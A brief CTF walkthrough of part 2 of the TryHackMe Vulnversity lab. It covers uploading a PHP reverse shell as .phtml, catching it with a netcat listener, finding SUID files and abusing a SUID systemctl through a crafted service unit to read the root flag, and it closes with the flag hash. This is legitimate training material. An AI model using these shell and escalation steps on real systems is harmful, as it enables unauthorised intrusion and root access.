TryHackMe Vulnversity part-2

CTF Writeup

Hello guys, In this blog we are going to see about vulnversity part 2 walkthrough.

Let’s get into part 2 of the Vulnversity challenge. After gathering the directory/internal and there is an option to upload the reverse_shell.phtml change PHP into PHTML. Make changes to your IP to file and port number.

After uploading the reverse shell there is a reverse shell we need to look into the page that file uploaded for that again we use gobuster.

From the screenshot, we came to know that /uploads file found.

Then start the listener i.e “nc -lvnp port “ and click the file that was uploaded on the webserver.

You will get a remote shell by doing this.

After gaining of shell you need to look for a user flag.

Inorder to look for SUID files you have to use command:

find / -user root -perm -4000 -exec ls -ldb {} \;

Then you will find /bin/systemctl. With the help of GTFObins, you will exploit /bin/systemctl and get into the root.

TF=$(mktemp).service
echo ‘[Service]
Type=oneshot
ExecStart=/bin/sh -c “cat /root/root.txt > /tmp/output”
[Install]
WantedBy=multi-user.target’ > $TF
/bin/systemctl link $TF
/bin/systemctl enable — now $TF

This is used for geting flag from root.

ans: a58ff8579f0a9270368d33a9966c7fd5